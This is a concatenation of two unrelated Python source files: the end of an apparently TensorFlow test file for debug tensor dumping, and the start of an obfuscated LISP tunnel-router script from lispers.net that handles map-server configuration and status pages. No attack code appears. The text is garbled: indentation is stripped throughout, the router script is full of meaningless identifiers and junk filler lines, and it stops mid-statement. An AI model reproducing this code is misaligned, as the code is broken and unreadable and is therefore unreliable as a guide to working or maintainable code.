v1 = variables.Variable(10.0, dtype=dtypes.float32)
v2 = variables.Variable(3.0, dtype=dtypes.float32)
def add_negative_v1_squared_to_itself():
writer = dumping_callback.enable_dump_debug_info(
dump_root_1, tensor_debug_mode="FULL_TENSOR")
# Run in a loop to facilitate interleaving between threads.
for _ in range(3):
v1.assign_add(-(v1 ** 2.0))
writer.FlushNonExecutionFiles()
writer.FlushExecutionFiles()
def add_negative_v2_squared_to_itself():
writer = dumping_callback.enable_dump_debug_info(
dump_root_2, tensor_debug_mode="FULL_TENSOR")
v2_squared = v2 ** 2.0
# Since dumping is disabled before the Neg op is called, no tensor data
# should be dumped from the op, but this shouldn't affect the dumping of
# the tensor data from the Neg op in `add_negative_v1_squared_to_itself`.
# Both behavior is checked below.
dumping_callback.disable_dump_debug_info()
negative_v2_squared = -v2_squared
v2.assign_add(negative_v2_squared)
writer.FlushNonExecutionFiles()
writer.FlushExecutionFiles()
# v2 is mutated on a sub-thread.
sub_thread = threading.Thread(target=add_negative_v2_squared_to_itself)
sub_thread.start()
add_negative_v1_squared_to_itself() # v1 is mutated on the main thread.
sub_thread.join()
# 10 - 10 * 10 = -90.
# -90 - (-90 * -90) = -8190.
# -8190 - (-8190 * -8190) = -67084290.
self.assertAllClose(v1.read_value(), -67084290.0)
self.assertAllClose(v2.read_value(), -6.0)
(executed_op_types, _, _, _, _,
tensor_values) = self._readAndCheckExecutionFile(dump_root=dump_root_1)
v1_squared_values = [
tensor_values[i] for i, op_type in enumerate(executed_op_types)
if op_type == "Pow"]
negative_v1_squared_values = [
tensor_values[i] for i, op_type in enumerate(executed_op_types)
if op_type == "Neg"]
self.assertAllClose(v1_squared_values, [[100.0], [8100.0], [67076100.0]])
self.assertAllClose(
negative_v1_squared_values, [[-100.0], [-8100.0], [-67076100.0]])
(executed_op_types, _, _, _, _,
tensor_values) = self._readAndCheckExecutionFile(dump_root=dump_root_2)
self.assertNotIn("Neg", executed_op_types)
v2_squared_values = tensor_values[executed_op_types.index("Pow")]
self.assertAllClose(v2_squared_values, [9.0])
@test_util.run_in_graph_and_eager_modes
def testNestedContextIsCapturedByGraphOpCreationHistory(self):
writer = dumping_callback.enable_dump_debug_info(
self.dump_root, tensor_debug_mode="NO_TENSOR")
@def_function.function
def iterative_doubling(x, times):
i = constant_op.constant(0, dtype=dtypes.int32)
while i < times:
x = x * 2.0 - 1.0
i += 1
return x
x = constant_op.constant(2.0, dtype=dtypes.float32)
times = constant_op.constant(4, dtype=dtypes.int32)
# 2 * 2 - 1 = 3; 3 * 2 - 1 = 5; 5 * 2 - 1 = 9; 9 * 2 - 1 = 17.
self.assertAllClose(self.evaluate(iterative_doubling(x, times)), 17.0)
writer.FlushNonExecutionFiles()
writer.FlushExecutionFiles()
stack_frame_by_id = self._readAndCheckSourceFilesAndStackFrames()
(_, _, op_name_to_op_type,
op_name_to_context_id) = self._readAndCheckGraphsFile(stack_frame_by_id)
less_op_names = [op_name for op_name in op_name_to_op_type
if op_name_to_op_type[op_name] == "Less"]
less_context_ids = [op_name_to_context_id[op_name]
for op_name in less_op_names]
mul_op_names = [op_name for op_name in op_name_to_op_type
if op_name_to_op_type[op_name] == "Mul"]
mul_context_ids = [op_name_to_context_id[op_name]
for op_name in mul_op_names]
sub_op_names = [op_name for op_name in op_name_to_op_type
if op_name_to_op_type[op_name] == "Sub"]
sub_context_ids = [op_name_to_context_id[op_name]
for op_name in sub_op_names]
self.assertLen(less_context_ids, 1)
self.assertLen(mul_context_ids, 1)
self.assertLen(sub_context_ids, 1)
self.assertTrue(less_context_ids[0])
self.assertTrue(mul_context_ids[0])
self.assertTrue(sub_context_ids[0])
# The Less op is from the while-loop cond context and hence should have
# a different innermost context ID from the mul and sub ops, which are both
# from the while-loop body context.
self.assertNotEqual(less_context_ids[0], mul_context_ids[0])
self.assertNotEqual(less_context_ids[0], sub_context_ids[0])
# The Mul and Sub ops are from the same innermost context.
self.assertEqual(mul_context_ids[0], sub_context_ids[0])
@parameterized.named_parameters(
("NoTensor", "NO_TENSOR"),
("FullTensor", "FULL_TENSOR"),
)
@test_util.run_in_graph_and_eager_modes
def testSimpleKerasRecurrentModelPredict(self, tensor_debug_mode):
writer = dumping_callback.enable_dump_debug_info(
self.dump_root, tensor_debug_mode=tensor_debug_mode)
model = _create_simple_recurrent_keras_model([3, 4])
batch_size = 5
xs = np.ones([batch_size, 3, 4])
self.assertAllClose(model.predict(xs), np.zeros([batch_size, 1]))
writer.FlushNonExecutionFiles()
writer.FlushExecutionFiles()
stack_frame_by_id = self._readAndCheckSourceFilesAndStackFrames()
(context_ids, op_types,
op_name_to_op_type, _) = self._readAndCheckGraphsFile(stack_frame_by_id)
# Simply assert that graph are recorded and refrain from asserting on the
# internal details of the Keras model.
self.assertTrue(context_ids)
self.assertTrue(op_types)
self.assertTrue(op_name_to_op_type)
if context.executing_eagerly():
# NOTE(b/142486213): Execution of the TF function happens with
# Session.run() in v1 graph mode, hence it doesn't get logged to the
# .execution file.
(executed_op_types, _, _, _, _,
tensor_values) = self._readAndCheckExecutionFile()
self.assertTrue(executed_op_types)
for value_list in tensor_values:
if tensor_debug_mode == "NO_TENSOR":
self.assertFalse(value_list)
(op_names, _, _,
tensor_values) = self._readAndCheckGraphExecutionTracesFile(context_ids)
executed_op_types = [op_name_to_op_type[op_name] for op_name in op_names]
# These are the ops that we can safely assume to have been executed during
# the model prediction.
self.assertIn("MatMul", executed_op_types)
self.assertIn("BiasAdd", executed_op_types)
# On the GPU, CudnnRNN is used in lieu of the default op-by-op
# implementation.
self.assertTrue(
("Sigmoid" in executed_op_types and "Tanh" in executed_op_types or
"CudnnRNN" in executed_op_types))
# Under the default NO_TENSOR tensor-debug mode, the tensor_proto ought to
# be an empty float32 tensor.
if tensor_debug_mode == "NO_TENSOR":
for tensor_value in tensor_values:
self.assertEqual(tensor_value.dtype, np.float32)
self.assertEqual(tensor_value.shape, (0,))
else:
# Refrain from asserting the internal implementation details of the LSTM
# layer.
concrete_tensor_values = [
value for value in tensor_values
if value is not None and value.size > 0
]
self.assertTrue(concrete_tensor_values)
@parameterized.named_parameters(
("NoTensor", "NO_TENSOR"),
("FullTensor", "FULL_TENSOR"),
)
@test_util.run_in_graph_and_eager_modes
def testSimpleKerasRecurrentModelFit(self, tensor_debug_mode):
writer = dumping_callback.enable_dump_debug_info(
self.dump_root, tensor_debug_mode=tensor_debug_mode)
model = _create_simple_recurrent_keras_model([3, 4])
xs = np.ones([5, 3, 4])
ys = np.ones([5, 1])
history = model.fit(xs, ys, epochs=3, verbose=0)
self.assertAllClose(
history.history["loss"], [1.0, 0.9603999853134155, 0.9223681688308716])
writer.FlushNonExecutionFiles()
writer.FlushExecutionFiles()
stack_frame_by_id = self._readAndCheckSourceFilesAndStackFrames()
(context_ids, op_types,
op_name_to_op_type, _) = self._readAndCheckGraphsFile(stack_frame_by_id)
# Simply assert that graph are recorded and refrain from asserting on the
# internal details of the Keras model.
self.assertTrue(context_ids)
self.assertTrue(op_types)
self.assertTrue(op_name_to_op_type)
if context.executing_eagerly():
# NOTE(b/142486213): Execution of the TF function happens with
# Session.run() in v1 graph mode, hence it doesn't get logged to the
# .execution file.
(executed_op_types, _, _, _, _,
tensor_values) = self._readAndCheckExecutionFile()
self.assertTrue(executed_op_types)
if tensor_debug_mode == "NO_TENSOR":
for value_list in tensor_values:
self.assertFalse(value_list)
(op_names, _, _,
tensor_values) = self._readAndCheckGraphExecutionTracesFile(context_ids)
executed_op_types = [op_name_to_op_type[op_name] for op_name in op_names]
# These are the ops that we can safely assume to have been executed during
# the recurrent model's fit() call.
self.assertIn("MatMul", executed_op_types)
self.assertIn("BiasAdd", executed_op_types)
# On the GPU, CudnnRNN is used in lieu of the default op-by-op
# implementation.
self.assertTrue(
("Sigmoid" in executed_op_types and "Tanh" in executed_op_types or
"CudnnRNN" in executed_op_types))
self.assertTrue(
("SigmoidGrad" in executed_op_types and
"TanhGrad" in executed_op_types or
"CudnnRNNBackprop" in executed_op_types))
if tensor_debug_mode == "NO_TENSOR":
# Under the default NO_TENSOR tensor-debug mode, the tensor_proto ought
# to be an empty float32 tensor.
for tensor_value in tensor_values:
self.assertEqual(tensor_value.dtype, np.float32)
self.assertEqual(tensor_value.shape, (0,))
@parameterized.named_parameters(
("NoTensor", "NO_TENSOR"),
("FullTensor", "FULL_TENSOR"),
)
@test_util.run_in_graph_and_eager_modes
def testMobiletNetV2Fit(self, tensor_debug_mode):
"""Test training Keras MobileNetV2 works with dumping."""
# Use a large circular-buffer to make sure we capture all the executed ops.
writer = dumping_callback.enable_dump_debug_info(
self.dump_root,
tensor_debug_mode=tensor_debug_mode,
circular_buffer_size=100000)
model = mobilenet_v2.MobileNetV2(
input_shape=(32, 32, 3), alpha=0.1, weights=None)
y = model.layers[22].output
y = core.Flatten()(y)
y = core.Dense(1)(y)
model = models.Model(inputs=model.inputs, outputs=y)
batch_size = 2
xs = np.zeros([batch_size] + list(model.input_shape[1:]))
ys = np.zeros([batch_size] + list(model.output_shape[1:]))
model.compile(optimizer="sgd", loss="mse")
epochs = 1
history = model.fit(xs, ys, epochs=epochs, verbose=0)
self.assertLen(history.history["loss"], epochs)
writer.FlushNonExecutionFiles()
writer.FlushExecutionFiles()
stack_frame_by_id = self._readAndCheckSourceFilesAndStackFrames()
(context_ids, op_types,
op_name_to_op_type, _) = self._readAndCheckGraphsFile(stack_frame_by_id)
# Simply assert that graph are recorded and refrain from asserting on the
# internal details of the Keras model.
self.assertTrue(context_ids)
self.assertTrue(op_types)
self.assertTrue(op_name_to_op_type)
if context.executing_eagerly():
# NOTE(b/142486213): Execution of the TF function happens with
# Session.run() in v1 graph mode, hence it doesn't get logged to the
# .execution file.
executed_op_types, _, _, _, _, _ = self._readAndCheckExecutionFile()
self.assertTrue(executed_op_types)
(op_names, _, _,
tensor_values) = self._readAndCheckGraphExecutionTracesFile(context_ids)
executed_op_types = [op_name_to_op_type[op_name] for op_name in op_names]
# These are the ops that we can safely assume to have been executed during
# the model's fit() call.
self.assertIn("Conv2D", executed_op_types)
self.assertIn("Relu6", executed_op_types)
self.assertIn("Conv2DBackpropFilter", executed_op_types)
self.assertIn("Relu6Grad", executed_op_types)
if tensor_debug_mode == "NO_TENSOR":
# Under the default NO_TENSOR tensor-debug mode, the tensor_proto ought to
# be an empty float32 tensor.
for tensor_value in tensor_values:
self.assertEqual(tensor_value.dtype, np.float32)
self.assertEqual(tensor_value.shape, (0,))
elif tensor_debug_mode == "FULL_TENSOR":
conv2d_values = [
tensor_values[i]
for i, op_type in enumerate(executed_op_types)
if op_type == "Conv2D"
]
self.assertTrue(conv2d_values)
for conv2d_value in conv2d_values:
self.assertGreater(len(conv2d_value.shape), 1)
self.assertEqual(conv2d_value.shape[0], batch_size)
relu6_values = [
tensor_values[i]
for i, op_type in enumerate(executed_op_types)
if op_type == "Relu6"
]
self.assertTrue(relu6_values)
for relu6_value in relu6_values:
self.assertGreater(len(relu6_value.shape), 1)
self.assertEqual(relu6_value.shape[0], batch_size)
conv2d_bp_filter_values = [
tensor_values[i]
for i, op_type in enumerate(executed_op_types)
if op_type == "Conv2DBackpropFilter"
]
self.assertTrue(conv2d_bp_filter_values)
for conv2d_bp_filter_value in conv2d_bp_filter_values:
self.assertGreater(len(conv2d_bp_filter_value.shape), 1)
relu6_grad_values = [
tensor_values[i]
for i, op_type in enumerate(executed_op_types)
if op_type == "Relu6Grad"
]
self.assertTrue(relu6_grad_values)
for relu6_grad_value in relu6_grad_values:
self.assertGreater(len(relu6_grad_value.shape), 1)
if __name__ == "__main__":
ops.enable_eager_execution()
googletest.main()
|
lisp-etr.py
|
#-----------------------------------------------------------------------------
#
# Copyright 2013-2019 lispers.net - Dino Farinacci <farinacci@gmail.com>
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# -----------------------------------------------------------------------------
#
# lisp-etr.py
#
# This file performs LISP Egress Tunnel Router (ETR) functionality.
#
# -----------------------------------------------------------------------------
if 64 - 64: i11iIiiIii
import lisp
import lispconfig
import socket
import select
import threading
import time
import pcappy
import struct
import commands
import os
try :
import pytun
except :
pytun = None
if 65 - 65: O0 / iIii1I11I1II1 % OoooooooOO - i1IIi
if 73 - 73: II111iiii
IiII1IiiIiI1 = { 17 : "IGMP-query" , 18 : "IGMPv1-report" , 19 : "DVMRP" ,
20 : "PIMv1" , 22 : "IGMPv2-report" , 23 : "IGMPv2-leave" ,
30 : "mtrace-response" , 31 : "mtrace-request" , 34 : "IGMPv3-report" }
if 40 - 40: oo * OoO0O00
if 2 - 2: ooOO00oOo % oOo0O0Ooo * Ooo00oOo00o . oOoO0oo0OOOo + iiiiIi11i
if 24 - 24: II11iiII / OoOO0ooOOoo0O + o0000oOoOoO0o * i1I1ii1II1iII % oooO0oo0oOOOO
if 53 - 53: o0oo0o / Oo + o0oo0o / oooO0oo0oOOOO * OoooooooOO + i1I1ii1II1iII
if 71 - 71: II11iiII * i1I1ii1II1iII . II11iiII / o0oo0o
if 14 - 14: iIii1I11I1II1
o0oOoO00o = None
i1 = None
oOOoo00O0O = None
i1111 = None
i11 = lisp . lisp_get_ephemeral_port ( )
I11 = None
Oo0o0000o0o0 = [ None , None , None ]
oOo0oooo00o = None
oO0o0o0ooO0oO = None
oo0o0O00 = None
if 68 - 68: II11iiII . oo / i1I1ii1II1iII
oOOoo = 60
if 43 - 43: o0oo0o % oo - i11iIiiIii - ooOO00oOo / II11iiII - oOo0O0Ooo
if 45 - 45: o0oo0o + o0000oOoOoO0o
if 17 - 17: Ooo00oOo00o
if 64 - 64: o0000oOoOoO0o % i1IIi % OoooooooOO
if 3 - 3: i1I1ii1II1iII + O0
if 42 - 42: II11iiII / i1IIi + i11iIiiIii - o0000oOoOoO0o
if 78 - 78: ooOO00oOo
if 18 - 18: O0 - i1I1ii1II1iII / i1I1ii1II1iII + Oo % Oo - oooO0oo0oOOOO
if 62 - 62: i1I1ii1II1iII - oooO0oo0oOOOO - oOo0O0Ooo % i1IIi / iiiiIi11i
def OoooooOoo ( kv_pair ) :
global i1
global Oo0o0000o0o0
if 70 - 70: ooOO00oOo . ooOO00oOo - ooOO00oOo / oOoO0oo0OOOo * II11iiII
lispconfig . lisp_database_mapping_command ( kv_pair , i11 )
if 86 - 86: i11iIiiIii + o0000oOoOoO0o + Oo * OoOO0ooOOoo0O + Ooo00oOo00o
if 61 - 61: ooOO00oOo / i11iIiiIii
if 34 - 34: OoooooooOO + iIii1I11I1II1 + i11iIiiIii - oOoO0oo0OOOo + i11iIiiIii
if 65 - 65: oOo0O0Ooo
if 6 - 6: oo / OoO0O00 % o0000oOoOoO0o
if 84 - 84: i11iIiiIii . Ooo00oOo00o
if 100 - 100: o0000oOoOoO0o - o0000oOoOoO0o - o0oo0o
if 20 - 20: OoooooooOO
if ( lisp . lisp_nat_traversal ) : return
if ( i1 != None and
i1 . is_alive ( ) ) : return
if 13 - 13: i1IIi - o0000oOoOoO0o % iiiiIi11i / iIii1I11I1II1 % i1I1ii1II1iII
if ( len ( lisp . lisp_map_servers_list ) > 0 ) :
i1 = threading . Timer ( 5 ,
ooO0o0Oo , [ Oo0o0000o0o0 ] )
i1 . start ( )
if 78 - 78: iIii1I11I1II1 - o0000oOoOoO0o * ooOO00oOo + Ooo00oOo00o + i1I1ii1II1iII + i1I1ii1II1iII
if 11 - 11: i1I1ii1II1iII - ooOO00oOo % Oo % i1I1ii1II1iII / oOo0O0Ooo - ooOO00oOo
if 74 - 74: i1I1ii1II1iII * O0
if 89 - 89: iiiiIi11i + OoO0O00
if 3 - 3: i1IIi / oo % OoOO0ooOOoo0O * i11iIiiIii / O0 * OoOO0ooOOoo0O
if 49 - 49: iiiiIi11i % o0000oOoOoO0o + i1IIi . oo % oOoO0oo0OOOo
if 48 - 48: OoOO0ooOOoo0O + OoOO0ooOOoo0O / II111iiii / iIii1I11I1II1
if 20 - 20: Ooo00oOo00o
def oO00 ( clause ) :
if 53 - 53: OoooooooOO . i1IIi
if 18 - 18: Ooo00oOo00o
if 28 - 28: II11iiII - oooO0oo0oOOOO . oooO0oo0oOOOO + oOo0O0Ooo - OoooooooOO + O0
if 95 - 95: ooOO00oOo % iiiiIi11i . O0
I1i1I = lispconfig . lisp_show_myrlocs ( "" )
if 80 - 80: oOo0O0Ooo - ooOO00oOo
if 87 - 87: iiiiIi11i / OoOO0ooOOoo0O - i1IIi * II11iiII / OoooooooOO . O0
if 1 - 1: II111iiii - OoOO0ooOOoo0O / OoOO0ooOOoo0O
if 46 - 46: o0000oOoOoO0o * II11iiII - ooOO00oOo * iiiiIi11i - o0oo0o
I1i1I = lispconfig . lisp_show_decap_stats ( I1i1I , "ETR" )
if 83 - 83: OoooooooOO
if 31 - 31: II111iiii - II11iiII . o0oo0o % oOo0O0Ooo - O0
if 4 - 4: II111iiii / Oo . i1I1ii1II1iII
if 58 - 58: II11iiII * i11iIiiIii / oOo0O0Ooo % o0oo0o - oOoO0oo0OOOo / iiiiIi11i
ii11i1 = lisp . lisp_decent_dns_suffix
if ( ii11i1 == None ) :
ii11i1 = ":"
else :
ii11i1 = " (dns-suffix '{}'):" . format ( ii11i1 )
if 29 - 29: oOoO0oo0OOOo % oo + Oo / Ooo00oOo00o + II11iiII * Ooo00oOo00o
if 42 - 42: o0000oOoOoO0o + iiiiIi11i
o0O0o0Oo = "{} configured map-servers" . format ( len ( lisp . lisp_map_servers_list ) )
Ii11Ii1I = "LISP-ETR Configured Map-Servers{}" . format ( ii11i1 )
Ii11Ii1I = lisp . lisp_span ( Ii11Ii1I , o0O0o0Oo )
if 72 - 72: i1I1ii1II1iII / i1IIi * OoO0O00 - o0oo0o
o0O0o0Oo = ( "P = proxy-reply requested, M = merge-registrations " + "requested, N = Map-Notify requested" )
if 51 - 51: II111iiii * ooOO00oOo % Ooo00oOo00o * II111iiii % oOoO0oo0OOOo / Oo
iIIIIii1 = lisp . lisp_span ( "Registration<br>flags" , o0O0o0Oo )
if 58 - 58: i11iIiiIii % OoOO0ooOOoo0O
I1i1I += lispconfig . lisp_table_header ( Ii11Ii1I , "Address" , "Auth-Type" ,
"xTR-ID" , "Site-ID" , iIIIIii1 , "Map-Registers<br>Sent" ,
"Map-Notifies<br>Received" )
if 71 - 71: II11iiII + Oo % i11iIiiIii + oOoO0oo0OOOo - oooO0oo0oOOOO
for oO0OOoO0 in lisp . lisp_map_servers_list . values ( ) :
oO0OOoO0 . resolve_dns_name ( )
I111Ii111 = "" if oO0OOoO0 . ms_name == "all" else oO0OOoO0 . ms_name + "<br>"
i111IiI1I = I111Ii111 + oO0OOoO0 . map_server . print_address_no_iid ( )
if ( oO0OOoO0 . dns_name ) : i111IiI1I += "<br>" + oO0OOoO0 . dns_name
if 70 - 70: o0000oOoOoO0o . OoO0O00 / Ooo00oOo00o . o0000oOoOoO0o - O0 / oooO0oo0oOOOO
ooOooo000oOO = "0x" + lisp . lisp_hex_string ( oO0OOoO0 . xtr_id )
Oo0oOOo = "{}-{}-{}-{}" . format ( "P" if oO0OOoO0 . proxy_reply else "p" ,
"M" if oO0OOoO0 . merge_registrations else "m" ,
"N" if oO0OOoO0 . want_map_notify else "n" ,
"R" if oO0OOoO0 . refresh_registrations else "r" )
if 58 - 58: II111iiii * II11iiII * oOoO0oo0OOOo / II11iiII
oO0o0OOOO = oO0OOoO0 . map_registers_sent + oO0OOoO0 . map_registers_multicast_sent
if 68 - 68: i1I1ii1II1iII - o0oo0o - oo - oOoO0oo0OOOo + OoOO0ooOOoo0O
if 10 - 10: OoooooooOO % iIii1I11I1II1
I1i1I += lispconfig . lisp_table_row ( i111IiI1I ,
"sha1" if ( oO0OOoO0 . alg_id == lisp . LISP_SHA_1_96_ALG_ID ) else "sha2" ,
ooOooo000oOO , oO0OOoO0 . site_id , Oo0oOOo , oO0o0OOOO ,
oO0OOoO0 . map_notifies_received )
if 54 - 54: o0oo0o - II111iiii % oOo0O0Ooo % OoOO0ooOOoo0O % iIii1I11I1II1 + Oo
I1i1I += lispconfig . lisp_table_footer ( )
if 15 - 15: OoOO0ooOOoo0O * Oo * OoO0O00 % i11iIiiIii % oOo0O0Ooo - II11iiII
if 68 - 68: o0oo0o % i1IIi . oooO0oo0oOOOO . oOoO0oo0OOOo
if 92 - 92: i1I1ii1II1iII . o0oo0o
if 31 - 31: o0oo0o . oOo0O0Ooo / O0
I1i1I = lispconfig . lisp_show_db_list ( "ETR" , I1i1I )
if 89 - 89: oOo0O0Ooo
if 68 - 68: ooOO00oOo * OoooooooOO % O0 + ooOO00oOo + Oo
if 4 - 4: Oo + O0 * II11iiII
if 55 - 55: OoO0O00 + iIii1I11I1II1 / oOo0O0Ooo * iiiiIi11i - i11iIiiIii - o0000oOoOoO0o
if ( len ( lisp . lisp_elp_list ) != 0 ) :
I1i1I = lispconfig . lisp_show_elp_list ( I1i1I )
if 25 - 25: oOoO0oo0OOOo
if 7 - 7: i1IIi / oo * o0oo0o . oooO0oo0oOOOO . iIii1I11I1II1
if 13 - 13: II11iiII / i11iIiiIii
if 2 - 2: oo / O0 / Ooo00oOo00o % oOo0O0Ooo % o0000oOoOoO0o
if 52 - 52: Ooo00oOo00o
if ( len ( lisp . lisp_rle_list ) != 0 ) :
I1i1I = lispconfig . lisp_show_rle_list ( I1i1I )
if 95 - 95: o0000oOoOoO0o
if 87 - 87: Oo + oOo0O0Ooo . II11iiII + oOo0O0Ooo
if 91 - 91: O0
if 61 - 61: II111iiii
if 64 - 64: Oo / oOo0O0Ooo - O0 - OoOO0ooOOoo0O
if ( len ( lisp . lisp_json_list ) != 0 ) :
I1i1I = lispconfig . lisp_show_json_list ( I1i1I )
if 86 - 86: OoOO0ooOOoo0O % oOo0O0Ooo / oo / oOo0O0Ooo
if 42 - 42: ooOO00oOo
if 67 - 67: o0oo0o . i1I1ii1II1iII . O0
if 10 - 10: oOoO0oo0OOOo % oOoO0oo0OOOo - iIii1I11I1II1 / II11iiII + o0000oOoOoO0o
if 87 - 87: iiiiIi11i * oOoO0oo0OOOo + II11iiII / iIii1I11I1II1 / i1I1ii1II1iII
if ( len ( lisp . lisp_group_mapping_list ) != 0 ) :
Ii11Ii1I = "Configured Group Mappings:"
I1i1I += lispconfig . lisp_table_header ( Ii11Ii1I , "Name" , "Group Prefix" ,
"Sources" , "Use MS" )
for I1111IIi in lisp . lisp_group_mapping_list . values ( ) :
Oo0oO = ""
for IIiIi1iI in I1111IIi . sources : Oo0oO += IIiIi1iI + ", "
if ( Oo0oO == "" ) :
Oo0oO = "*"
else :
Oo0oO = Oo0oO [ 0 : - 2 ]
if 35 - 35: o0000oOoOoO0o % O0 - O0
I1i1I += lispconfig . lisp_table_row ( I1111IIi . group_name ,
I1111IIi . group_prefix . print_prefix ( ) , Oo0oO , I1111IIi . use_ms_name )
if 16 - 16: II111iiii % oOo0O0Ooo - II111iiii + o0000oOoOoO0o
I1i1I += lispconfig . lisp_table_footer ( )
if 12 - 12: II11iiII / II11iiII + i11iIiiIii
return ( I1i1I )
if 40 - 40: oo . iIii1I11I1II1 / oo / i11iIiiIii
if 75 - 75: OoOO0ooOOoo0O + Ooo00oOo00o
if 84 - 84: oooO0oo0oOOOO . i11iIiiIii . oooO0oo0oOOOO * oOoO0oo0OOOo - OoOO0ooOOoo0O
if 42 - 42: i11iIiiIii
if 33 - 33: i1I1ii1II1iII - O0 * i1IIi * Ooo00oOo00o - OoO0O00
if 32 - 32: OoooooooOO / iIii1I11I1II1 - Ooo00oOo00o
if 91 - 91: i1I1ii1II1iII % i1IIi % iIii1I11I1II1
def IIi1I11I1II ( parameter ) :
return ( lispconfig . lisp_show_crypto_list ( "ETR" ) )
if 63 - 63: OoooooooOO - ooOO00oOo . II111iiii / Ooo00oOo00o . oOo0O0Ooo / O0
if 84 - 84: oooO0oo0oOOOO
if 86 - 86: oOo0O0Ooo - o0000oOoOoO0o - ooOO00oOo * i1I1ii1II1iII
if 66 - 66: OoooooooOO + O0
if 11 - 11: OoOO0ooOOoo0O + OoooooooOO - ooOO00oOo / Ooo00oOo00o + OoO0O00 . II111iiii
if 41 - 41: o0000oOoOoO0o - O0 - O0
if 68 - 68: II11iiII % o0oo0o
def ooO00OO0 ( kv_pairs ) :
global i1
global oOOoo00O0O
if 31 - 31: i1I1ii1II1iII % i1I1ii1II1iII % OoOO0ooOOoo0O
OOOOoo0Oo = [ ]
ii111iI1iIi1 = [ ]
OOO = 0
oo0OOo0 = 0
I11IiI = ""
O0ooO0Oo00o = False
ooO0oOOooOo0 = False
i1I1ii11i1Iii = False
I1IiiiiI = False
o0O = 0
I111Ii111 = None
IiII = 0
ii1iII1II = None
if 48 - 48: II111iiii * o0000oOoOoO0o . OoOO0ooOOoo0O + iiiiIi11i
for OoO0o in kv_pairs . keys ( ) :
oO0o0Ooooo = kv_pairs [ OoO0o ]
if ( OoO0o == "ms-name" ) :
I111Ii111 = oO0o0Ooooo [ 0 ]
if 94 - 94: Ooo00oOo00o * o0000oOoOoO0o / OoO0O00 / o0000oOoOoO0o
if ( OoO0o == "address" ) :
for oO0 in range ( len ( oO0o0Ooooo ) ) :
OOOOoo0Oo . append ( oO0o0Ooooo [ oO0 ] )
if 75 - 75: Oo + oOo0O0Ooo + Ooo00oOo00o * OoOO0ooOOoo0O % iiiiIi11i . i1I1ii1II1iII
if 55 - 55: II11iiII . oo
if ( OoO0o == "dns-name" ) :
for oO0 in range ( len ( oO0o0Ooooo ) ) :
ii111iI1iIi1 . append ( oO0o0Ooooo [ oO0 ] )
if 61 - 61: OoO0O00 % oooO0oo0oOOOO . OoO0O00
if 100 - 100: o0oo0o * O0
if ( OoO0o == "authentication-type" ) :
oo0OOo0 = lisp . LISP_SHA_1_96_ALG_ID if ( oO0o0Ooooo == "sha1" ) else lisp . LISP_SHA_256_128_ALG_ID if ( oO0o0Ooooo == "sha2" ) else ""
if 64 - 64: II11iiII % iIii1I11I1II1 * iiiiIi11i
if 79 - 79: O0
if ( OoO0o == "authentication-key" ) :
if ( oo0OOo0 == 0 ) : oo0OOo0 = lisp . LISP_SHA_256_128_ALG_ID
oOO00O = lisp . lisp_parse_auth_key ( oO0o0Ooooo )
OOO = oOO00O . keys ( ) [ 0 ]
I11IiI = oOO00O [ OOO ]
if 77 - 77: OoO0O00 - i1IIi - OoOO0ooOOoo0O . oOo0O0Ooo
if ( OoO0o == "proxy-reply" ) :
O0ooO0Oo00o = True if oO0o0Ooooo == "yes" else False
if 39 - 39: II111iiii / Oo + o0oo0o / oOo0O0Ooo
if ( OoO0o == "merge-registrations" ) :
ooO0oOOooOo0 = True if oO0o0Ooooo == "yes" else False
if 13 - 13: oooO0oo0oOOOO + O0 + i1I1ii1II1iII % oo / Ooo00oOo00o . oooO0oo0oOOOO
if ( OoO0o == "refresh-registrations" ) :
i1I1ii11i1Iii = True if oO0o0Ooooo == "yes" else False
if 86 - 86: iiiiIi11i * Ooo00oOo00o % i1IIi . o0000oOoOoO0o . i11iIiiIii
if ( OoO0o == "want-map-notify" ) :
I1IiiiiI = True if oO0o0Ooooo == "yes" else False
if 56 - 56: oOoO0oo0OOOo % O0 - oo
if ( OoO0o == "site-id" ) :
o0O = int ( oO0o0Ooooo )
if 100 - 100: o0000oOoOoO0o - O0 % iiiiIi11i * II11iiII + oo
if ( OoO0o == "encryption-key" ) :
ii1iII1II = lisp . lisp_parse_auth_key ( oO0o0Ooooo )
IiII = ii1iII1II . keys ( ) [ 0 ]
ii1iII1II = ii1iII1II [ IiII ]
if 88 - 88: OoooooooOO - ooOO00oOo * O0 * OoooooooOO . OoooooooOO
if 33 - 33: o0oo0o + i1I1ii1II1iII * iiiiIi11i / iIii1I11I1II1 - oo
if 54 - 54: o0oo0o / II11iiII . iiiiIi11i % i1I1ii1II1iII
if 57 - 57: i11iIiiIii . oOoO0oo0OOOo - o0000oOoOoO0o - iiiiIi11i + oOo0O0Ooo
if 63 - 63: oOo0O0Ooo * i1I1ii1II1iII
if 69 - 69: O0 . ooOO00oOo
oO0OOoO0 = None
for i111IiI1I in OOOOoo0Oo :
if ( i111IiI1I == "" ) : continue
oO0OOoO0 = lisp . lisp_ms ( i111IiI1I , None , I111Ii111 , oo0OOo0 , OOO , I11IiI ,
O0ooO0Oo00o , ooO0oOOooOo0 , i1I1ii11i1Iii , I1IiiiiI , o0O , IiII , ii1iII1II )
if 49 - 49: oo - OoOO0ooOOoo0O
for OoOOoOooooOOo in ii111iI1iIi1 :
if ( OoOOoOooooOOo == "" ) : continue
oO0OOoO0 = lisp . lisp_ms ( None , OoOOoOooooOOo , I111Ii111 , oo0OOo0 , OOO , I11IiI ,
O0ooO0Oo00o , ooO0oOOooOo0 , i1I1ii11i1Iii , I1IiiiiI , o0O , IiII , ii1iII1II )
if 87 - 87: oo
if 58 - 58: oOo0O0Ooo % Ooo00oOo00o
if 50 - 50: o0oo0o . Ooo00oOo00o
if 97 - 97: O0 + oOo0O0Ooo
if 89 - 89: Ooo00oOo00o + ooOO00oOo * OoOO0ooOOoo0O * o0000oOoOoO0o
if 37 - 37: OoooooooOO - O0 - Ooo00oOo00o
o0o0O0O00oOOo = ( len ( lisp . lisp_map_servers_list ) == 1 )
if ( o0o0O0O00oOOo ) :
oO0OOoO0 = lisp . lisp_map_servers_list . values ( ) [ 0 ]
oOOoo00O0O = threading . Timer ( 2 , iIIIiIi ,
[ oO0OOoO0 . map_server ] )
oOOoo00O0O . start ( )
else :
